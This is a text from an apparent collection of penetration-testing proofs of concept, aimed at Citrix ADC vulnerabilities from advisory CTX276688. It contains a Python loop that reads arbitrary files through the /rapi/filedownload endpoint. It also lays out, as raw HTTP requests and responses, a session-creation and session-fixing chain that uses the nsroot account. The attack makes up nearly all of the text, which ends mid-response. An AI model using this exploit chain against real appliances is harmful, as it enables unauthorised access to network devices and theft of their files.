poc--exp:常用渗透poc收集

# Citrix ADC Vulns ## CVE List https://support.citrix.com/article/CTX276688  ##### Add if while Code https://dmaasland.github.io/posts/citrix.html ``` response_str = json.dumps(r.headers.__dict__['_store']) if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private": print ("[+] Send Success!") print ("_"*80,"\n\n") print (r.text) print ("_"*80) while 1: PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8") url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1) r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies) if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private": print ("_"*80,"\n\n") print (r.text) print ("_"*80) # pass else: print ("[+] Error!") ```   ## 0x01 create_session ``` POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: 10.20.24.248 User-Agent: python-requests/2.24.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/xml X-NITRO-USER: Cu59z69j X-NITRO-PASS: vgR7HPQ0 Content-Length: 44 <appfwprofile><login></login></appfwprofile> ``` ``` HTTP/1.1 406 Not Acceptable Date: Fri, 10 Jul 2020 18:45:26 GMT Server: Apache X-Frame-Options: SAMEORIGIN Set-Cookie: SESSID=3be0633199c076f0613d084b758978c3; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; Content-Length: 4489 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/xml; charset=utf-8 <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div> ``` ## 0x02 fix_session ``` GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: 10.20.24.248 User-Agent: python-requests/2.24.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: SESSID=3be0633199c076f0613d084b758978c3 ``` ``` HTTP/1.1 302 Found Date: Fri, 10 Jul 2020 18:45:27 GMT Server: Apache X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: is_cisco_platform=0; expires=Mon, 05-Jul-2021 18:45:27 GMT; Max-Age=31104000; path=/; HttpOnly Location: /menu/neo X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; Content-Length: 416 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div> ``` ##### /menu/neo 302 ``` GET /menu/neo HTTP/1.1 Host: 10.20.24.248 User-Agent: python-requests/2.24.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: SESSID=3be0633199c076f0613d084b758978c3; is_cisco_platform=0 ``` ``` HTTP/1.1 200 OK Date: Fri, 10 Jul 2020 18:45:29 GMT Server: Apache X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: startupapp=neo; expires=Mon, 05-Jul-2021 18:45:29 GMT; Max-Age=31104000; path=/; HttpOnly Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; Content-Length: 1771 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Citrix ADC - Configuration</title> <script type="text/javascript">var neo_logout_url = "/menu/lo?rand=1450749159.1594406727843271";</script> <script type="text/javascript">var neo_machine_sysid = "450010";var rand = "1450749159.1594406727843271";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script> <script type="text/javascript">var global_data = "{global_data}";</script> ``` ## 0x03 get_rand ``` GET /menu/stc HTTP/1.1 Host: 10.20.24.248 User-Agent: python-requests/2.24.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: SESSID=3be0633199c076f0613d084b758978c3; is_cisco_platform=0; startupapp=neo ``` ``` HTTP/1.1 200 OK Date: Fri, 10 Jul 2020 18:45:30 GMT Server: Apache X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; Content-Length: 15505 Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang=